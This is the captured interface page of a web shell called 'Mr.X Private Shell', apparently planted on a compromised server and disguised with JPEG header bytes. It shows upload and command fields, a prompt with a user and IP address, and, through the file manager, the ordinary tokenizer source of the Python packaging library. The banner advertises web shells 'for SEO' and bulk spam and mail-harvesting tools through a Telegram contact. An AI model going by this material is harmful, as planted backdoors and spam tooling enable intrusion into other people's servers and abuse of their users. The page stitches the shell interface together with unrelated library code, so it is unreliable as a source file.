����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
from __future__ import annotations

import contextlib
import re
from dataclasses import dataclass
from typing import Generator, Mapping, NoReturn

from .specifiers import Specifier


@dataclass
class Token:
    name: str
    text: str
    position: int


class ParserSyntaxError(Exception):
    """The provided source text could not be parsed correctly."""

    def __init__(
        self,
        message: str,
        *,
        source: str,
        span: tuple[int, int],
    ) -> None:
        self.span = span
        self.message = message
        self.source = source

        super().__init__()

    def __str__(self) -> str:
        marker = " " * self.span[0] + "~" * (self.span[1] - self.span[0]) + "^"
        return f"{self.message}\n    {self.source}\n    {marker}"


DEFAULT_RULES: dict[str, re.Pattern[str]] = {
    "LEFT_PARENTHESIS": re.compile(r"\("),
    "RIGHT_PARENTHESIS": re.compile(r"\)"),
    "LEFT_BRACKET": re.compile(r"\["),
    "RIGHT_BRACKET": re.compile(r"\]"),
    "SEMICOLON": re.compile(r";"),
    "COMMA": re.compile(r","),
    "QUOTED_STRING": re.compile(
        r"""
            (
                ('[^']*')
                |
                ("[^"]*")
            )
        """,
        re.VERBOSE,
    ),
    "OP": re.compile(r"(===|==|~=|!=|<=|>=|<|>)"),
    "BOOLOP": re.compile(r"\b(or|and)\b"),
    "IN": re.compile(r"\bin\b"),
    "NOT": re.compile(r"\bnot\b"),
    "VARIABLE": re.compile(
        r"""
            \b(
                python_version
                |python_full_version
                |os[._]name
                |sys[._]platform
                |platform_(release|system)
                |platform[._](version|machine|python_implementation)
                |python_implementation
                |implementation_(name|version)
                |extras?
                |dependency_groups
            )\b
        """,
        re.VERBOSE,
    ),
    "SPECIFIER": re.compile(
        Specifier._operator_regex_str + Specifier._version_regex_str,
        re.VERBOSE | re.IGNORECASE,
    ),
    "AT": re.compile(r"\@"),
    "URL": re.compile(r"[^ \t]+"),
    "IDENTIFIER": re.compile(r"\b[a-zA-Z0-9][a-zA-Z0-9._-]*\b"),
    "VERSION_PREFIX_TRAIL": re.compile(r"\.\*"),
    "VERSION_LOCAL_LABEL_TRAIL": re.compile(r"\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*"),
    "WS": re.compile(r"[ \t]+"),
    "END": re.compile(r"$"),
}


class Tokenizer:
    """Context-sensitive token parsing.

    Provides methods to examine the input stream to check whether the next token
    matches.
    """

    def __init__(
        self,
        source: str,
        *,
        rules: Mapping[str, re.Pattern[str]],
    ) -> None:
        self.source = source
        self.rules = rules
        self.next_token: Token | None = None
        self.position = 0

    def consume(self, name: str) -> None:
        """Move beyond provided token name, if at current position."""
        if self.check(name):
            self.read()

    def check(self, name: str, *, peek: bool = False) -> bool:
        """Check whether the next token has the provided name.

        By default, if the check succeeds, the token *must* be read before
        another check. If `peek` is set to `True`, the token is not loaded and
        would need to be checked again.
        """
        assert self.next_token is None, (
            f"Cannot check for {name!r}, already have {self.next_token!r}"
        )
        assert name in self.rules, f"Unknown token name: {name!r}"

        expression = self.rules[name]

        match = expression.match(self.source, self.position)
        if match is None:
            return False
        if not peek:
            self.next_token = Token(name, match[0], self.position)
        return True

    def expect(self, name: str, *, expected: str) -> Token:
        """Expect a certain token name next, failing with a syntax error otherwise.

        The token is *not* read.
        """
        if not self.check(name):
            raise self.raise_syntax_error(f"Expected {expected}")
        return self.read()

    def read(self) -> Token:
        """Consume the next token and return it."""
        token = self.next_token
        assert token is not None

        self.position += len(token.text)
        self.next_token = None

        return token

    def raise_syntax_error(
        self,
        message: str,
        *,
        span_start: int | None = None,
        span_end: int | None = None,
    ) -> NoReturn:
        """Raise ParserSyntaxError at the given position."""
        span = (
            self.position if span_start is None else span_start,
            self.position if span_end is None else span_end,
        )
        raise ParserSyntaxError(
            message,
            source=self.source,
            span=span,
        )

    @contextlib.contextmanager
    def enclosing_tokens(
        self, open_token: str, close_token: str, *, around: str
    ) -> Generator[None, None, None]:
        if self.check(open_token):
            open_position = self.position
            self.read()
        else:
            open_position = None

        yield

        if open_position is None:
            return

        if not self.check(close_token):
            self.raise_syntax_error(
                f"Expected matching {close_token} for {open_token}, after {around}",
                span_start=open_position,
            )

        self.read()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
licenses Folder 0755
LICENSE File 197 B 0644
LICENSE.APACHE File 9.94 KB 0644
LICENSE.BSD File 1.31 KB 0644
__init__.py File 494 B 0644
_elffile.py File 3.14 KB 0644
_manylinux.py File 9.33 KB 0644
_musllinux.py File 2.64 KB 0644
_parser.py File 10.27 KB 0644
_structures.py File 1.48 KB 0644
_tokenizer.py File 5.29 KB 0644
markers.py File 12.47 KB 0644
metadata.py File 38.44 KB 0644
py.typed File 0 B 0644
pylock.py File 22.01 KB 0644
requirements.py File 2.8 KB 0644
specifiers.py File 39.86 KB 0644
tags.py File 22.32 KB 0644
utils.py File 4.92 KB 0644
version.py File 22.74 KB 0644